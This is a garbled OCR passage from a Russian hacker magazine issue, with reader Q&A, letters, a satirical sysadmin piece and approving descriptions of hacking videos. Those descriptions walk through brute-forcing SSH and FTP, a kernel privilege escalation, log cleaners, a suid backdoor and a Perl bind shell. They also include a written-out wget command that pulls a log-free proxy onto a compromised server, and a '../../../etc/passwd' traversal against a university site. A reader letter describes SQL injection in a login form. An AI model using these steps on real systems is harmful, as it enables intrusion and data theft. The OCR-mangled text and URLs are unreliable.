венных банков, при этом цена обслуживания за год, как правило, не превыша- 
ет 600-700 рублей. Единственное предъявляемое требование - первоначаль- 
ный баланс на карте (в моем городе меня попросили положить аж 6000 руб- 
лей). Можешь смело взять эту сумму в долг. Как только карта будет готова, ты 
сможешь снять деньги и при любом удобном случае вернуть их законному вла- 
дельцу. Кредитки эти бывают как рублевыми, так и долларовыми. Причем пу- 
гаться рублевой ни в коем случае не стоит - просто при каждой покупке за гра- 
ницей будет происходить автоматическая конвертация денег из одной валюты 
в другую по актуальному курсу. 

Есть, кстати, еще один способ оперативно оплатить счет кредиткой в интерне- 
те. И это стало возможным благодаря отечественному сервису Пирау 
(ѵѵѵѵѵѵ.гирау.сот). Последний предлагает купить виртуальную кредитную карту но- 
миналом $10, $20, $50 и $100. После оплаты ты получишь всю необходимую 
информацию по карте Ѵіза и сразу же сможешь приступить к покупкам. При- 
чем конкретные ФИО к карте не привязываются, так что при заполнении реги- 
страционных данных ты сможешь вводить что угодно! Срок действия таких карт 
составляет 2 месяца, пополнить их нельзя. Единственный минус этой фишки - 
дороговизна услуги. 



® 

® 



Сейчас активно начал интересоваться технологией взлома ѴѴі-Рі-се- 
тей. Признаться честно, даже немного в этом преуспел. Однако но- 
ситься по всему городу с ноутбуком мне немного надоело. Подумы- 
ваю приобрести специальный девайс для поиска ѴѴі-Рі ІАІ^ов. Мо- 
жет, посоветуешь что-нибудь конкретное? 



Ну а как же! Посоветую, конечно! Как ты смотришь на то, чтобы 
прикупить себе девайс размером с брелок для ключей? По правде го- 
воря, это и есть брелок для ключей, но не простой, а волшебный. С виду ми- 
ниатюрный ѴѴі-Рі Ріпсіег очень сильно смахивает на пульт от автомобильной 
сигнализации. Тот же кусок пластмассы с несколькими кнопочками. Но стоит 
только кликнуть пальцем по одной из них, как девайс мигом определит, есть 
ли поблизости ѴѴі-Рі-сетка или нет. Пеленгует девайс на расстоянии до 300 
футов и, что немаловажно, умеет выводить уровень сигнала. Заказать его 
можно на сайте разработчиков: шѵѵ.пегіШпе.сопМі!іТіп(1ег-ѵѵігеІе$$-іп(егпеІМпІ. 
Удовольствие это стоит $30. Много это или мало - решать тебе. 




® 



Пишу приложение на ѴізиаІ Вазіс. Возможно, вы уже отвечали на этот 
вопрос, но в РРР-подшивке я ничего подобного не нашел. А вопрос 
таков: как поместить иконку программы в системный трей? Перелис- 
тал полностью свою книгу по ѴізиаІ Вазіс’у (около 1 000 страниц), но 
подходящей инфы там нет. Что за книги теперь пишут... 



За это отвечает функция ЗІпеІІМоМуІсоп. Открой М50ІМ. Там имеет- 
ся описание синтаксиса, значения системных констант, сравнения ва- 
риантов использования. Там же присутствуют и конкретные примеры. Если 
М5РМ под рукой нет, то посмотри в директории с примерами, поставляющей- 
ся с ѴВ по умолчанию. Конкретно каталог Тгауісоп. Там лежит отличный класс 
для работы с системным треем - Тгауісоп. сіз. Разобраться с ним не составит 
труда. 



® 



® 



Похоже, интернет-провайдеры сошли с ума. В Москве сплошь и ря- 
дом идет реклама сразу нескольких компаний, предлагающих выде- 
ленку с безлимитным трафиком за $20-30 в месяц на вполне прием- 
лемой скорости. Не долго думая, я пошел и подключился к одной из 
них. Первое впечатление - все супер. НО! Прочитав намедни пол- 
ностью договор, я был неприятно удивлен следующими строками: 
«Оператор имеет право уменьшить техническую скорость передачи 
данных по тарифным планам с соответствующим уведомлением Або- 
нента, если в течение 3-х месяцев подряд среднемесячный объем 
входящего трафика Абонента превышает 20 Гбайт». Обещали анлим, 
а здесь уже какие-то ограничения... Законно ли это? Обманывают 
ведь народ! 



Я бы не был столь категоричным и обманом этот пункт договора на- 
зывать не стал. Это своеобразная защита от «спортсменов», пытаю- 
щихся побить свои личные рекорды используемого за месяц трафика. И таких 
вот рекордсменов, поверь, хватает! Только прикинь, каково будет провайде- 
ру, если сразу несколько десятков (или сотен) пользователей начнут исполь- 
зовать свой канал на 80-100 процентов круглые сутки? Правильно - ничего хо- 
рошего. Да и мало тебе, что ли, 20 Гб? Информация к размышлению: в про- 
винции гигабайт на выделенке стоит $50, а модемный анлим - $100. Так что 
радуйся тому, что имеется. Тем более, юридические лазейки присутствуют 
практически в любом договоре. И этот - не исключение. 



® 



® 



Пару номеров назад вы тестировали ОУО-/+Ш приводы. Тогда наг- 
раду «Лучшая покупка» получил привод МЕС-2500А. Однако у него 
есть один досадный недостаток: он не умеет записывать двухслой- 
ные диски. А для меня это очень важно, поэтому сейчас подумываю 
взять старшую модель линейки ІМЕС’ов - 3500А. Как вы считаете, это 
достойный выбор? 



Скажу тебе по большому секрету: МЕС-2500А тоже умеет записы- 
вать двухслойные болванки, но его надо немножечко модернизиро- 
вать. Особых усилий для этого не потребуется. Достаточно зайти на сайт 
Шр://МЬ.грс1.огд и скачать оттуда свежую версию флешера (программа для за- 
ливки в привод новых прошивок) и сам йггшаге. Что делать с ними дальше, 
думаю, объяснять не надо ;). 

Что же касается МЕС-3500А, то он оставил только приятные впечатления. При- 
вод обладает всеми плюсами младших моделей линейки и может похвастать- 
ся изменившимся дизайном, а также увеличенными скоростными показателя- 
ми. Существенных минусов обнаружено не было. Подробный обзор ты мо- 
жешь почитать на сайте шшхЬГсоп. 
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Фотоконкурс продолжается ! ! ! 

За месяц нам пришло довольно большое количество фотографий читатель- 
ниц и девушек наших читателей. 

Довольно забавно было смотреть на всякие извращения в фотографическом 
виде. Нам присылали фотки, на которых были запечатлены не только особи 
женского пола, но даже и солдаты-духи в полном комплекте химзащитной 
одежды (деды-читатели постарались). 

Но все равно мы решили продолжить наш конкурс. Причина банальна: кому-то 
журнал попадает с большим опозданием и он не может физически успеть принять 
в конкурсе участие. Обидно, не правда ли? 



Так что ждем от тебя еще фотографий по адресу: копкиг$@геаІ. хакер. ги. 









Спустя несколько секунд ВгиШз объявил о том, что нашелся 
один ламер, установивший легкий пароль. Хакер 
приконнектился на 22 порт и получил доступ к интерпретатору 
/Ып/ЬазП. Поднять права было несложно - в системе 
установлено старое ядрышко. Вместе с эксплойтом взломщик 
закачал логклинер, а затем набросал легкий бэкдор. Теперь 
нужно было замаскировать файлы и установить суид на бэкдор. 

Когда хакер позаботился о безопасности, он установил 
приватные соксы и выполнил первую часть коварного плана. Но 
на этом он не успокоился. Взломщик запалил, что у одного 
администратора в каталоге .ззП лежат ключи для соединения с 
другим сервером. К сожалению, кей был запаролен, поэтому 
хакеру снова пришлось прибегнуть к брутфорсу. Скачав 
необходимый софт для расшифровки, злоумышленник 



видео: стпвии НОСКИ 



Ходят слухи, что сотрудники спецслужб специально 
устанавливают свои прокси-серверы, которые полностью 
логируют весь проходящий через них трафик. Если какой- 
нибудь хакер воспользуется такой проксей, то считай, что он 
под колпаком у правоохранительных органов. Поэтому чтобы 
быть уверенным в том, что никто не контролирует прокси- 
сервер, взломщики устанавливают на похаканных тачках свои 
соксы и юзают их в своих грязных целях ;). В этом ѵізиаІМаск’е 
хакер устанавливает сокс-сервер и конфигурирует его так, 
чтобы он работал и при этом не вел никаких логов. Сам 
понимаешь, если Іод-файлы на проксе не сохраняются, узнать, 
кто пользовался сервером, станет крайне трудно. 

Вот что конкретно делает хакер: сначала он берет веб- шелл 
из своей заначки, находит на сервере каталог, открытый на 
запись для всех юзеров, заливает туда перловый скрипт, 
биндящий шелл на 32767 порту, после чего запускает его. 
Далее он использует утилиту МеіСаі, для того чтобы 
соединиться с сервером. Итак, хакер внутри, пора начинать 
установку прокси-сервера Зргоху. В этом ролике она сводится к 
четырем шагам. Для начала исполняется команда сб Дтр; ѵѵдеі 
Шр://$есигііу.ппоѵ.ги/$о№ргоху/0.4.5Ь/Зргоху.ід2, в результате 
чего сорцы Зргоху сливаются в папку Дтр. После этого пожатые 
исходники расТАВиваются в текущую папку командой Іаг хигі 
Зргоху. ідг. Далее взломщик приступает к компиляции софтины. 
Для этого он набирает команду таке -I МакеТіІе.ипіх, 
результате выполнения которой сорцы собираются в один 
исполняемый файл Зргоху. 

Потом он дает файлу Зргоху менее приметное имя 2 Йр, 
чтобы лопоухий админ не заметил ничего подозрительного 
списке процессов. Собственно, после всех этих нехитрых 
действий он запускает сам откомпилированный бинарник. 



Подробный ход событий ты можешь изучить в статье 
«Ставим носки», а для более понятной картины можешь 
ознакомиться с интересным видеороликом. 

ВИДЕО: И03Г0В0Й ШТУРМ ФИНЛЯНДИИ 

Так случилось, что одному хакеру понадобился финский ресурс, 
для того чтобы установить на нем анонимный прокси-сервер. 
Взломщик зашел на доодіе.сот и дал точный запрос с помощью 
некоторых поисковых конструкций. В ответ злоумышленник 
получил несколько сотен ссылок, которые и стал изучать. Его 
внимание привлек небольшой университетский проект (как 
выяснилось позже, написанный на Питоне). Скрипт публиковал 
исходники определенных СИшных файлов. Стоило хакеру 
переопределить путь кСИшнику в виде ../../../../../../еіс/раззѵѵб, как 
браузер показал содержимое системного файла. К сожалению, 
взломщик не мог добиться выполнения команд через дырявый 
скрипт, но это было и не нужно. С помощью самопального 
сценария злоумышленник отделил валидные аккаунты от мусора, а 
также составил комболист в виде Іодіп:Іодіп. Теперь ничто не 
мешало скормить лист брутусу и ждать результата. Бругфорс был 
запущен на 21 порту. 




объединяет его с известной тулзой «боПп ТПе Віррег». Через 
несколько минут фраза успешно расшифровалась, а хакер 
сумел порулить еще одним финским сервером. 

Подробнее - в статье «Мозговой штурм Финляндии», и не 
забудь посмотреть видеоролик на диске! 

ПІІВОВПИРЕСТОВІІВВШЕВ 3.2.4 

Офигительная программа, записывающая видеодиски (СР- 
П, РѴР-В, РѴР+В, РѴР+ВѴѴ, РѴР-ВѴѴ) для последующего 
просмотра на любом ДВД-плеере. Я, например, уже давно 
смотрю через музыкальный центр переписанные с отживших 
свое видеокассет записи моей молодости... Эх. Аврора 
позволяет создавать менюшки, менять фон и некоторые другие 
параметры. Также присутствуют различные спецэффекты, что, 
несомненно, придаст твоему фильму солидности. 
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К -СПЕЙ 



Да, члены команды нашего журнала любят подурачиться. Но это совсем не значит, что они такие раздолбаи 
постоянно и во всем. У каждого из них есть абсолютно серьезные желания и планы на свою дальнейшую жизнь. 

Об этом они нам сейчас и поведают. 

»»«.ІіѵеіоигпаІ.сош/соттипііу/х_сге»/ 



В моем молодом возрасте и хорошем 
состоянии, в котором я пребываю 
большую часть жизни, мне как-то лучше 
живется сегодняшним днем и строить 
далеко идущие планы не особо хочется. 

Но все-таки я не полнейший раздолбай, и 
мысли на этот счет у меня имеются. В 
будущем хочется уверенно встать на ноги, закупить себе пару-тройку 
десятков соток плодородной земли, отстроить достойный дом. При этом хочется 
иметь интересную и любимую (что важно) работу. К примеру, работать в Хакере, 
но параллельно создавать что-то свое. Кроме таких довольно попсовых желаний 
планирую постоянно учиться чему-то новому, экспериментировать с экстримом 
во всех его проявлениях, короче, радоваться жизни и не стоять на месте. 



ОіЬООЬІік 



— 









ного чего хочу и много о чем мечтаю, хотя 
всячески и скрываю свою сентименталь- 
ность, потому как стесняюсь. От этого меня моя 
бывшая девушка считала оленем бездушным :). 
На самом деле хочу растить детей. Мне поров- 
ну, мальчика или девочку. Просто обожаю детей 
и хочу, чтобы у меня они были тоже. Свои. Для 
этого, разумеется, надо жениться. Чтобы жениться, необходимо встать на ноги 
твердо, потому что не хочется в первые годы совместной жизни обременять сво- 
их родителей. Чтобы встать на ноги, надо много работать, думать и добиваться. 
Пока это не особо получается, потому что я еще молод и глуп :). Но я надеюсь, 
что скоро моя мечта осуществится и я буду счастлив :). А еще я хочу пожить в 
землянке. Только в теплой землянке и с интернетом :). 



О) Вг.КІоиш 



П умаю, мое будущее должно быть связано с медициной. В данный момент планирую поступать в ординатуру по терапии 
(кардиология) (ординатура - это нечто типа последипломной специализации у медиков). Из терапии есть два пути: либо работать 
кардиологом и постепенно изыскивать пути для научных и руководящих должностей, либо пытаться прорваться за границу, 
специализироваться там в іпіегпаі тебісіпе и радоваться жизни. Второй вариант мне нравится меньше. Думаю, ничего не может быть 
лучше скромного места директора коммерческого госпиталя в России :). Кстати, бросать журналистику я не буду, поскольку очень люблю 
эту работу. Просто рассказать надо о будущем, а это - настоящее и будущее :). 



О) пікі(022 



отличными людьми и 



детстве я хотел быть резчиком по дереву, астрономом, промышленным альпинистом и даже оператором штамповочной машины. 
Забавно думать, как быстро меняются взгляды человека на общество, себя самого и на свое место в тщательно выстроенном 
механизме социума. Я всегда старался жить по собственным принципам, всегда следовал по собственному пути в глобальном 
понимании. Я не живу по расписанию, я распыляю свое время на очень многие вещи. Некоторые мне говорят, что это неправильно, 
что я безответственен. Я таких не слушаю. Они не понимают, что у меня есть план, который я постоянно корректирую. Я ищу. Ищу 
себя, ищу свое дело, ищу своих людей. И то обстоятельство, что сейчас я решаю краевую задачу для эллиптического уравнения, не 
помешает мне отправиться вечером на ска-панк-концерт. Как я вижу свое будущее? Я окончу институт, получу диплом математика- 
программиста, почувствую себя сильным, займусь собственным Делом и встречу, наконец, девушку, которая будет мила внешне и 
внутренне, достаточно открыта и умна, чтобы понять, что ей нужно. Буду счастлив тем, что хорошо делаю свое Дело, окружен 
делаю счастливой любимую женщину. 









Здарова хацкера! 

Ну не буду распинаться какой ваш журнал крутой, а сра- 
зу перейду к просьбе. 

Помниться в старинном номерах журнала (в районе 26) 
были статьи про бесплатный сыр а точнее про спонсоров 
там всяких рефералов и тому подобное. 

Хотелось бы чтобы вы написали как нить про это обнов- 
ляя инфу об этих самых спонсорах и объяснили как все 
это провернуть (я тупой с первого раза не понимаю) 
Ведь беззубая старость не за горами (лет эдак 40 всего- 
то)! Да и щас бабулясы не помешали бы :)... 

Кароче рад буду любому ответу, даже если вы напишите 
«А ни пойти ли тебе на ***, мы тут рулим журналом!» 
Всем вам большой РЕСПЕКТ! 



ответ к: 






Ах, Асда асда! Ну как ты мог подумать, что мы мо- 
жем так написать и послать тебя? Да, мы рулим журна- 
лом, но куда рулить, говорите нам вы - наши читатели. 
Скажешь вот ты рулить в сторону бесплатного сыра - 
обойдем все рынки нашей необъятной и вынюхаем, где 
этот самый сыр бесплатный. И без мышеловок. Только 
меру в просьбах надо знать - нам хочется расти и подни- 
мать с нами твой уровень, а не опускаться к низам. Так 
что давай про сыр ты все-таки сам разузнаешь, а мы те- 
бе расскажем лучше про то, как, например, поиметь ха- 
лявный интернет с помощью ѴѴі-Рі. Договорились? 



о 



письмо от: 



Александра <аІехепа_п^@таіІ.ги> 



Привет хакерам! Я тут на днях приобрела ваш великолепный 
журнальчик... первый раз. Скажу честно, я пожалела, что раньше не покупала 
его. Моему опыту работы с компом скоро исполнится 4 года, а в инете я ваще 
тока месяц. В «Хакере» нашла много че интересного, но и много чего 
непонятного. По сему пожелание: побольше информации для новичков. 



ответ к: 



□ 



Приветствую, Александра! 

Мне лестно, что нашим журналом интересуются девушки. Значит, не все так 
плохо в нашем мире! Значит, не только о кулинарных рецептах читают 
представительницы слабого пола! Значит, они и мозгами любят шевелить! Я 
рад! Спасибо вам за это! Мы поможем вам развить компьютерные познания, 
так что приготовьтесь, наденьте фартуки - обучение будет интенсивное, 
сложное, но очень увлекательное. Для новичков мы постараемся выделить 
место в журнале и устроить ликбез. А пока могу посоветовать просмотреть 
всю подшивку журналов (благо ее легко найти в формате РЭЕ), и тогда в 
компьютерном мире все станет намного яснее. Даешь больше компьютери- 
зированных девушек! :) 



© 



письмо от: 



А13 <аІ5@паѵідаІог.Іѵ> 



Хакер злой, в тебя бросаю перезрелый слог с размаху, 
Даже рифму поленился подобрать я для злодея, 

Что во мраке ночи жуткой над компьютером сгорбатясь 
Вирус страшный сотворяет скрежеща от зла зубами. 

Выйдет как-нибудь однажды вирус твой из-под контроля, 

Все твои сожрет программы на глазах твоих бесстыжих. 
Побежишь тогда сгорбатясь к славным братьям программистам 
Слезы по щекам размазав: «Помогите, стану добрым!» 

Но ответят программисты на тебя нахмуря брови: 

«Нет!» Собой едва владея грозно дверь тебе укажут. 

И пойдешь в библиотеку, посидишь в читальном зале, 

Горы книг перелистаешь, нехорошая свинья. 

Пожелтеешь весь от пыли, геморроем заболеешь, 

Мы тебя не пожалеем - нам такие не друзья! 



© 




ответ к; 



□ 



Антихакер, тебе ответ я посылаю, как рэппер дизит всех в ответ! 

Но, как и ты, я рифму буду стараться всяко избегать! 

Пишу я вирус - это правда, но не сожрет он прог моих! 

Зато он нападет на программистов и уничтожит базы данных! 

И программисты прибегут, согнувши плечи, головы втянув, 

Ко мне. И спросят: «Помоги, о хакер! А мы тебе дадим секретный код!». 

А я скажу: «Вы чурки, черти! Я ненавижу вас, козлы!». 

А вирус мой захватит всю планету, в которой каждый четвертый - узкоглазый. 
И будет счастье всем, и все поймут, как плохо 
Крутым хакерам геморроем угрожать! 

На этом я писать ответ кончаю. Надеюсь, убедил тебя я, да? 

А если нет - пиши мне еще писем. Поговорим, но только лишь в стихах. 






письмо от: 



КеЗеІЗкіп <5 гезеІ@таіІ.ги> 



Здарова парни, и девчонки. Слов много но скажу 
самое важное, теперь с 0\І0 журнал просто СУПЕР! Это 
***** (здесь было неприличное слово, поэтому его приш- 
лось заменить на звездочки - прим, ред.) диск на кото- 
ром найдешь все все все, и новье и проги какие надо, да 
и по цене ниже, да плюс журнал - я теперь просто подсел 
на это дело, это цепляет меня круче любой наркоты, ко- 
торой мне и так не надо. Огромное вам спасибо. И еще 
хочу сказать что в июльском (67) номере я не нашел об- 
ложек для 2-х компашек, хотелось бы их положить в па- 
кетик с компашкам. 




ответ к: 



□ 



з 



Здарова, ПереУстанавливаемаяКожа! Ну и ник у 
тебя - как посмотришь, не верится, что тебя так вставля- 
ет без помощи наркотиков. Складывается впечатление, 
что твой мозг настолько порабощен всякой дрянью, что 
тебе даже пришлось кожу переустановить! Так что, ми- 
лый, не стоит так злоупотреблять чем бы то ни было, да- 
же нашим диском. Мы за здоровый образ жизни и за 
чистоту русского языка, поэтому раз ты матерился в 
письме, ты не получишь дисковых обложек 67-го номера. 
Вот так! 



П 






і 








Привет перЦы. 

Ну и кто Вы после этого??? Я Вас всех спрашиваю!!! Взять выпустить «Хакер + Р\Ю» когда постоянные перцы подписались на пол года «Хакер + 2СР», и сейчас 
сидят облизываются и завидуют тем кто покупает в торговых точках. Что нам теперь делать: подписываться по новой или покупать дополнительно? Че немогли 
заменить 2СО на Р\Ю? Это ни есть гут. Нельзя так со своими постоянными читателями поступать. Короче я зол. Вроде маленько успокоился. Несмотря на 
название журнала и высказывания отдельных засранцев выросших на Вашем журнале о Вашем постепенном «ламерстве» и сокращении РС-гопе, считаю что 
РС-гопе нужна и требует дальнейшего разрастания!!! Журнал начала читать моя жена - изег, это о многом говорит, что вы можете и пишите так, что даже 
начинающие начинают вникать и познавать. Желаю Вам дельнейшего софтвенного и сраничного разрастания. А за западло с ШЭ поубивал бы!!! 




ответ к: 



□ 






Привет, Тяжелый ник 76-го года рождения! 

После того как мы выпустили ЭѴО к журналу, мы просто чмыри :(. Не надо было нам этого делать, согласны. Лучше бы мы выпустили журнал с 
пятью дискетками. Тогда бы те, кто был подписан на «Хакер» + 2 СО, не сидели бы и не пускали слюнки, а чувствовали бы свое превосходство. 
А если серьезно, то мы просто не могли ждать полгода, чтобы у людей кончилась подписка. Потому что все равно кто-нибудь бы взял да и под- 
писался еще на полгода. А потом бы угрожал нам расправой за то, что мы заставляем его пускать слюни. Короче, успокойся :). 

Мы тоже не обращаем внимания на возгласы всяких засранцев, что наш журнал постепенно ламереет, несмотря на название. Поэтому рубри- 
ку «РСгопе» мы решили сделать более мясной и хардкорной, что ты уже, скорее всего, заметил. 

Очень классно, что твоя жена подсадила тебя на наш журнал. Жаль только то, что она изег. Лучше бы она была хакершей. 

Ну все, удачи в семейной жизни! Желаем вам с женой наплодить кучу новых читателей. А за 0\Ю не убивай нас, плиз! Лучше приходи к нам в 
редакцию и получи диск на халяву. 



о 



письмо от: 



Пупа Васькин <ѵрира@іпЬох.ги> 



© 



Привет! А вы знаете, что ваш журнал прикольный? Ну, теперь точно 
знаете! Кстати, хотел спросить, что будет, если при занятии любовью с 
девушкой, я кончу раньше, чем она и как этого избежать? А вообще ваш 
журнал очень интересный. Кстати, оказывается, ѴѴіпсІоѵѵз - это не только 
картинка при загрузке, а еще и название операционной системы!!! Я вче- 
ра как узнал, чуть не офигел. Теперь вот и вы знаете. Что, офигели? То-то 
же. Да, журнал инфой не испортишь. Кстати, не могу найти кряк для ва- 
шего сайта. Посоветуйте что-нибудь. Кстати, где мои тапки? Только что 
были туг... Ладно, хрен с ними, потом найдете, лучше делайте журнал. 
Кстати, как насчет того, чтобы сделать журнал ежедневным/еженедель- 
ным/ежедвухнедельным? Эй, кто там в моем холодильнике? Ну, ладно, 
мне пора. Потом еще напишу, если будете себя хорошо вести. 

#оиісІис!е <Ьгаіпз> 

#іпсІисІе <Ьеег> 

#іпсІис!е <Ьеег> 

#іпсІисІе <Ьеег> 

#іпс!исІе <Ьеег> 



Здорова! А ты знаешь, что у коровы четыре копыта? Ну теперь 
ты точно знаешь. Кстати, когда я приколачиваю пятку, у меня руки дро- 
жат от нетерпения. А вообще мы стараемся делать нормальный журнал. 
Кстати, Гейтса зовут Биллом, прикинь! Я как узнал, вторую пятку прико- 
лотил! Кстати, наш сайт фриварный, к нему нет кряков. Кстати, где моя 
пятка? Только что приколотил - и нету... Ладно, потом найду, а пока бу- 
ду делать журнал. Кстати, вот она, пятка-то! Ну ладно, кстати, журнал 
был и будет ежемесячным. Эй, а фигли ты в холодильнике мою пятку 
запрятал? Эй, куда ты пошел-то? Стоять! Че у тебя в карманах? А это 
что, кстати? Пятка??? Ты не припух? Отдавай. Теперь свободен, кстати. 
#с!еТіпе <Ьеег> <руа1ка> 

#іпсІисІе <Ьеег> 

#іпсІисІе <Ьеег> 

#іпсІисІе <Ьеег> 

#іпс!исІе <Ьеег> 



письмо от: 



«Евгений» <2е1пуа@уапс1ех.ги> 




Здарова ][акеры! 

Я попал! Последовал вашему примеру (невзирая на предупреждения о 
том что повторять не нужно) и в форме входа на личный счет абонента 
нашего провайдера (шйи.ш) в поле «Пароль» набрал ' просто ' и ни- 
чего больше и мне выдалась инфа о состоянии юзера! Ну я немного по- 
пользовался этой дырой: посмотре когда и с какого номера выходят в 
инет пользователи, зареганые под ником «огепіѵ» (совпадает с назва- 
нием местного телеканала), посмотрел инфу о других юзерах (типа 
іѵапоѵ, реігоѵ). Наигравшись я решил похвалиться (стормозил) и пошел 
в форум, написал сообщение примерно следующего содержания: 
Админ! Давай ты разрешишь в форуме добавление файлов, а я тебе 
расскажу о баге на странице авторизации. 

[Я написал просьбу о добавлении файлов чтобы можно было из инета 
сливать файлы на форум, а потом через тестовый вход сливать к себе] 
Он недолго думая исправил багу, и пишет: 
все твои действия записаны, думаю на днях на тебя напишут бумагу ку- 
да надо и машина закрутится [Это он написал в привате, а в форуме 
сообщения были более дружелюбными] 

И вот блин я не знаю что мне делать! Может он прикалывается, как вы 
думаете? Расскажите по какой статье меня могу осудить и как я за это 
буду отвечать (мне 16 лет) и как мне можно отмазаться? 

С нетерпением жду вашего ответа, надеюсь он придет раньше чем пра- 
воохранительные органы заявятся ко мне домой. 




Мда, Евгений, ты попал! И, к сожалению, не на ТиВи... А 
все почему? Потому что не слушался остережений, написанных 
специально для тебя. Вот так всегда и бывает. Хотя кто не рискует, 
тот не побеждает. Вполне возможно, что админ тебя разводит, 
чтобы не выглядеть тупоносом, который не смог обеспечить 
грамотную защиту. Так что не волнуйся - если ты еще читаешь эти 
строки, сидя в уютном кресле в большой комнате своей квартиры, 
то, возможно, за тобой уже и не придут. При удачном раскладе 
советую выучить жизненный урок и в будущем не пробовать на 
себе все, о чем пишут в журналах, в газетах и на порносайтах. Так 
твоя жизнь может закончиться или испортиться гораздо раньше 
отведенного природой срока. Так что шутки в сторону! 








ШОР 



ОСОБЕННОСТИ ПОСТРОЕНИЯ 
СЕТЕЙ О БЮДЖЕТНЫХ 

организациях. 

трактат 



Из жизни системных администраторов 

Жизнь сисадмина интересна и полна всякого рода курьезов. Сисадмины - это 
такие особые персонажи, которые жиеут совершенно в другом измерении и не 
могут считаться нормальными людьми, потому что таковыми не являются. Давай 
посмотрим, какие особенности присутствуют в их работе. И какие особенности 
были выявлены мной за три года работы админом в государственном учреждении. 






постулаты ибд 

ля начала сформулируем ряд 
постулатов, которыми будет 
определяться описанное в 
данном трактате. 

О. В бюджетных организациях 
на фиг никому ничего не надо, по- 
тому что зарплата от количества 
сожженных калорий не зависит. 
О. В бюджетных организаци- 
ях приходится заниматься ИБД (имитацией бур- 
ной деятельности), чтобы показать, как много ка- 
лорий сжигается за такую зарплату. 

ѳ. Занятие ИБД дурно влияет на мозг. Он начи- 
нает воспринимать ИБД как нормальную работу и 
впоследствии сам имитирует собственную работу. 

о. Если сотрудник быстро делает свою рабо- 
ту (занимается ИБД), значит, он - бездельник 
(плохо имитирует бурную деятельность), поэтому 
быстро заниматься ИБД нельзя. 

основная часть 

Теоремы будут даны в сплошной нумерации и 
без доказательств, ибо доказательств можно 
привести миллион. 

I. Схемотехника компьютера. 

Компьютер = монитор + клавиатура + мышь, а 
системный блок - причина всех бед. 



Следствия: 

1.1. Для нормализации работы компьютера 
следует быстро пробежаться по клавиатуре, пос- 
тучать по монитору, подвигать мышь, а потом, ес- 
ли не помогает, пнуть системный блок и вызвать 
администратора. 

1 .2. Панацея от зависаний - кнопка Везеі 

1 .3. Лучший компьютер - ноутбук, потому что у 
него нет системного блока. 

О. О правильном питании. 

Источники бесперебойного питания (ИБП) ра- 
ботают правильно, только будучи разряженными 
до предела, при этом они могут выдержать лю- 
бые нагрузки (за исключением случаев рачитель- 
ной материальной ответственности). 

Следствия: 

2.1. В ИБП принято включать именно монито- 
ры и прочую периферию (принтеры, сканеры, мо- 
демы). Если их много, то все обязательно в один 
ИБП. Системный блок включается в розетку без 
применения сетевого фильтра и ИБП. 

2.2. Активное сетевое оборудование (хабы, 
свичи, серверы), ввиду своей повышенной на- 
дежности, не нуждается в ИБП. В случае выхода 
из строя (выключения) оборудования для его 
включения в розетку вызывается администратор. 

2.3. Для достижения заявленных в теореме 
параметров заряда ИБП он выключается из 
розетки на ночь. 



®. Случай рачительной матответствен- 
ности. 

Самое ценное в компьютере - ИБП. Поэтому 
компьютер не должен быть подключен к нему во 
избежание порчи ИБП. 

Следствия: 

3.1. После поломки ИБП компьютер выключа- 
ется навсегда, потому что у него нет ИБП. 

3.2. Новый ИБП во избежание порчи не выдается. 

О. Первая теорема о сетевом взаимо- 
действии. 

Для рутового акцесса на любой компьютер в 
сети используется логин «Администратор», а па- 
роль пустой или «1». 

Следствия: 

4.1. От администратора сети требуется тща- 
тельное сохранение расшаренных папок компью- 
теров в секретности и запрет доступа в них другим 
«Администраторам» с паролем пустым или «1». 

4.2. Для усложнения политики безопасности 
сетевые диски подключаются с паролем «1», а 
доступ на локальную машину с пустым паролем 
(или наоборот). Смысл в том, чтобы для доступа 
к данным пришлось бы больше набирать разных 
паролей. 

4.3. У оператора ПК, посещающего извращенские 
порносайты с педофильскими троянскими скрипта- 
ми, должен быть рутовый акцесс ко всей сети. 

4.4. В компьютере, в данный момент нужном 
администратору больше всего, пароль сменен 
продвинутым пользователем с «1» на «ааа», и его 
подбор бессмыслен. 

О. Вторая теорема о сетевом взаимо- 
действии. 

ІР-адрес любой машины выбирается произ- 
вольно. 

Следствия: 

5.1. Конфликт ІР-адресов в сети и подмена ІР 
в системе безопасности неизбежны. В случае 
возникновения таковых проблем вызывается ад- 
министратор. 

5.2. Топология строения сети в итоге трудно 
перенастраиваема и абсолютно немобильна. 

о. О проводке (китайская теорема о 
трех тысячах ниток). 

Проводка по коробам не маркируется, все про- 
вода смотаны жгутом. 

Следствия: 

6.1. Вытягивание провода для переноски его в 
другой короб приведет к неработоспособности сети. 

6.2. Жгут проводов подтянут не к шкафу со 
свичами, а к столу, на полке которого лежит свич. 
Свич, в соответствии с п.2.2, подключен к розет- 
ке. Малейшее движение проводов обесточивает 
свич и выключает сеть. 

6.3. Избыточность сети. Когда сеть налажена и 
работает стабильно, срочно требуется менять ее 
топологию, потому что начальнику требуется но- 
вый компьютер с доступом в сеть. 

О. О бесконечности геморроя. 

Если требуется круглосуточная работа сети, 
скорее всего, она была смонтирована на скорую 
руку с одной очередью работ и не поддается пе- 
ределке. 





Дополнение: 

7.1 . Если не требуется круглосуточная работа 
сети, то оно и на фиг не надо. 

Ѳ. Теорема о взаимокомпенсации. 

Если в вашей комнате уже МЕСЯЦ стоит но- 
вый, но уже распакованный лазерный принтер, у 
него успеет закончиться тонер в результате 
действий «Ух-ты-какой-у-вас-тут-принтер-сто- 
ит-дайте-напечатать-а-то-я-сам-приду-потом- 
когда-вас-тут-не-будет» ровно за день до того, 
как этот принтер повесят на вас. В то же время, 
ровно МЕСЯЦ вам понадобится, чтобы запол- 
нить все документы и расписаться во всех книж- 
ках для выдачи вам 3 (трех) коннекторов ц-45, 
необходимых для восстановления соединения с 
критически важным сервером. 

Ѳ. Теорема об именах. 

Все создаваемые папки называются «Новая 
папка(М+1)». N - натуральное, больше 100. 

Следствия: 

9.1. Папки, в которых лежат наиболее важные 
и часто запрашиваемые документы, находятся 
не менее чем на 32 уровне вложенности и име- 
ют мнемонически понятные имена: «111», «1», 
«1111111». 

9.2. Разветвленность дерева, содержащего 
важную папку, пропорциональна экспоненте от 
уровня важности. 

©. Теорема о резервном копировании. 

Резервное копирование - способ вытрясти 
последние деньги на покупку никому не нужного 
дурацкого стримера. 

Следствия: 

10.1 .1 . Копирование постоянно обновляемой 
и используемой базы производится админист- 
ратором в момент покупки новой машины с 80 
Гб винчестером, совпавшим, по случаю, с необ- 
ходимостью переустановки ОС на сервере в ре- 
зультате действий продвинутого юзера. 

10.1.2. Один из винчестеров рейд-массива 
сервера не выдерживает кустомизации настроек 
продвинутым пользователем после переуста- 
